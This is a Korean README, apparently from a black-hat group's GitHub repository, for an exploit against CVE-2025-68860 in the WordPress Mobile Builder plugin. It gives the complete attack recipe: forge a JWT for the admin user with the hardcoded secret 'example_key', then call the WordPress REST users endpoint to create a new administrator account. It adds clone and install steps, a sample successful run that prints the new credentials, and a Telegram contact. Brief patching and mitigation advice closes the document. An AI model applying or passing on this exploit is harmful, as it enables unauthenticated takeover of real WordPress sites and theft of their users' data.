
CVE-2025-68860을 대상으로 하는 WordPress Mobile Builder 플러그인용 익스플로잇 스크립트. 하드코딩된 비밀을 사용하여 위조된 JWT 토큰을 생성하고 관리자로 인증한 후 REST API를 통해 새로운 관리자 계정을 만듭니다.
WordPress Mobile builder 플러그인 버전 1.4.2 이하는 인증 우회 취약점이 존재하며, 공격자는 기본 시크릿 "example_key"로 유효한 JWT 토큰을 생성하여 관리자(user_id=1)로 인증할 수 있습니다. 해당 토큰을 사용하여 공격자는 새로운 관리자 계정을 생성하고 사이트를 장악할 수 있습니다.
CVE: CVE-2025-68860
원인: JWT에 하드코딩된 시크릿 키 "example_key" 사용, 적절한 검증 부재.
취약점 위치: Mobile builder 플러그인에서 JWT 인증을 처리하는 파일(예: class-jwt-auth.php)이 기본값 'example_key'인 JWT_SECRET 상수를 사용합니다. 이 시크릿은 설정을 통해 변경할 수 없으므로 공격자는 임의의 user_id에 대한 토큰을 생성할 수 있습니다.
영향: 공격자는 user_id=1(admin)에 대한 토큰을 생성하고 REST API 엔드포인트에 접근하여 관리자 역할의 새 사용자를 생성할 수 있습니다.
CVSS: 높음(점수 8.8) - 네트워크 벡터, 사용자 상호작용 불필요.
스크립트가 user_id: 1 (admin) 및 시크릿 "example_key"를 포함한 페이로드로 JWT 토큰을 생성합니다.
토큰을 사용하여 /wp-json/wp/v2/users/에 접근해 관리자 접근을 확인합니다.
성공하면 스크립트가 /wp-json/wp/v2/users에 POST 요청을 보내 사용자명 dedsec1337, 비밀번호 admin, 이메일 [email protected], 역할 administrator로 새 사용자를 생성합니다.
출력에 자격 증명과 API 응답이 표시됩니다.
Python 3.6+
라이브러리: requests, PyJWT, colorama
WordPress 사이트에 Mobile builder 플러그인 버전 <= 1.4.2가 활성화되어 있어야 함.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 인증 우회 익스플로잇 ║
║ CVE-2025-68860 우선순위: 높음 ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
익스플로잇 제공: Dedsec Team Exploit
텔레그램 : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder 인증 우회
[INFO] 이전의 모든 익스플로잇/설정은 무시되며, 이 벡터만 실행됩니다.
사이트 URL (예: http://target.site): http://localhost/wordpress
[INFO] 관리자(user_id=1)로 JWT 생성 중...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] /wp-json/wp/v2/users/me에서 JWT 테스트 중
[SUCCESS] JWT 유효! 관리자 접근 확인됨.
--------------------------------------------------------------
[INFO] 익스플로잇을 사용하여 관리자 계정 생성 중...
[INFO] 익스플로잇 실행 중, 잠시 기다려 주세요...
[SUCCESS] ✅ 관리자 사용자가 성공적으로 생성되었습니다!
==============[ 새 관리자 자격 증명 ]==============
사용자명 : dedsec1337
비밀번호 : admin
이메일 : [email protected]
===================================================
전체 API 응답:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] 익스플로잇 완료. 셸을 즐기세요.
...
공격자는 새로운 관리자 계정을 생성하고, 모든 WordPress 기능에 접근하며, 악성 플러그인 설치, 콘텐츠 변경, 사용자 데이터 탈취, 또는 추가 공격에 사이트를 이용할 수 있습니다.
이 취약점은 사전 인증 없이 원격으로 악용될 수 있습니다.
영향: WordPress 사이트 전체가 손상됩니다.
Mobile builder 플러그인을 최신 버전(>=1.4.3)으로 즉시 업데이트하십시오.
업데이트가 없는 경우 플러그인을 일시적으로 비활성화하십시오.
사이트에 의심스러운 사용자가 있는지 확인하십시오.
웹 애플리케이션 방화벽(WAF)을 사용하여 REST API 엔드포인트에 대한 의심스러운 요청을 차단하십시오.
임시 조치로 플러그인 코드에서 시크릿 키를 변경하고(가능한 경우) REST API에 대한 접근을 제한하십시오.